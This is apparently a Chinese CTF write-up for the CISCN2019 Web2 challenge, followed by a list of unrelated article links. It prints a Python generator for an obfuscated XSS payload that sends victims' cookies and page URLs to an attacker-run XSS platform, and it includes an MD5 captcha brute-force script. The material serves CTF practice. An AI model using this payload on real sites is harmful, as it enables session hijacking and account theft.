当前位置: 首页 > news >正文

[CISCN2019 华东北赛区]Web2

news 来源:原创 2024/4/27 13:25:09

[CISCN2019 华东北赛区]Web2

  • 随便注册一个登录,发现
    image.png
  • 还有反馈页面,一看就知道大概率是xss,应该是为了得到管理员cookie
  • 扫描了一下,果然有admin.php后台登录
    image.png
  • buu可以连接访问外网了,所以内部的xss平台关闭了,使用自己搭建的莲花平台,不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

image.png
根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
  • 然后提交文章,得到连接,来到反馈页面
    image.png
  • 说了要将域名改成web
    验证码
import hashlib
num=input()
for i in range(999999,10000000):m=hashlib.md5()m.update(str(i).encode())m=m.hexdigest()if m[:6]==num:print(i)break
  • 然后我得不到管理员的cookie啊,算了,反正思路是这样的,有没有大佬知道为什么的
  • 得到phpsessid之后登录,然后就是一个简单的sql注入

相关文章:

  • 【idea做lua编辑器】IDEA下lua插件报错编辑器打不开(同时安装EmmyLua和Luanalysis这2个插件就报错,保留EmmyLua插件即可)
  • 发车,易安联签约某新能源汽车领军品牌,为科技创新保驾护航
  • 【详细讲解yarn的安装和使用】
  • LLMs之Grok-1:run.py文件解读—运行语言模型实现推理—即基于用户的输入文本利用grok_1语言模型来生成文本
  • 【Flink connector】文件系统 SQL 连接器:实时写文件系统以及(kafka到hive)实战举例
  • Maven 继承父工程时的relativePath标签解析用法
  • ACL和NAT
  • 程序员开发技术整理
  • Python包管理工具 pip 及其常用命令和参数用法
  • 计算机网络——数据链路层(差错控制)
  • uniapp小程序中onShareAppMessage(OBJECT)实现带参数的分享功能
  • 以太网PHY,MAC及其通信接口介绍
  • Code Review(代码审查)
  • HTML5 、CSS3 、ES6 新特性
  • 宝塔面板操作一个服务器域名部署多个网站
  • [译] 怎样写一个基础的编译器
  • 【399天】跃迁之路——程序员高效学习方法论探索系列(实验阶段156-2018.03.11)...
  • Angular 响应式表单之下拉框
  • axios请求、和返回数据拦截,统一请求报错提示_012
  • Fastjson的基本使用方法大全
  • iOS小技巧之UIImagePickerController实现头像选择
  • JavaScript DOM 10 - 滚动
  • javascript 哈希表
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • Javascript设计模式学习之Observer(观察者)模式
  • JSDuck 与 AngularJS 融合技巧
  • python3 使用 asyncio 代替线程
  • Xmanager 远程桌面 CentOS 7
  • 笨办法学C 练习34:动态数组
  • 缓存与缓冲
  • 基于Dubbo+ZooKeeper的分布式服务的实现
  • 新书推荐|Windows黑客编程技术详解
  • 移动端唤起键盘时取消position:fixed定位
  • 源码之下无秘密 ── 做最好的 Netty 源码分析教程
  • 找一份好的前端工作,起点很重要
  • 正则学习笔记
  • ​​​​​​​​​​​​​​汽车网络信息安全分析方法论
  • ​sqlite3 --- SQLite 数据库 DB-API 2.0 接口模块​
  • # .NET Framework中使用命名管道进行进程间通信
  • # Java NIO(一)FileChannel
  • # Swust 12th acm 邀请赛# [ K ] 三角形判定 [题解]
  • # 深度解析 Socket 与 WebSocket:原理、区别与应用
  • #传输# #传输数据判断#
  • #在线报价接单​再坚持一下 明天是真的周六.出现货 实单来谈
  • (9)目标检测_SSD的原理
  • (C语言)fread与fwrite详解
  • (二)JAVA使用POI操作excel
  • (二)linux使用docker容器运行mysql
  • (二)正点原子I.MX6ULL u-boot移植
  • (附源码)springboot学生选课系统 毕业设计 612555
  • (九十四)函数和二维数组
  • (全部习题答案)研究生英语读写教程基础级教师用书PDF|| 研究生英语读写教程提高级教师用书PDF
  • (五)MySQL的备份及恢复
  • (转)拼包函数及网络封包的异常处理(含代码)
  • .[backups@airmail.cc].faust勒索病毒的最新威胁:如何恢复您的数据?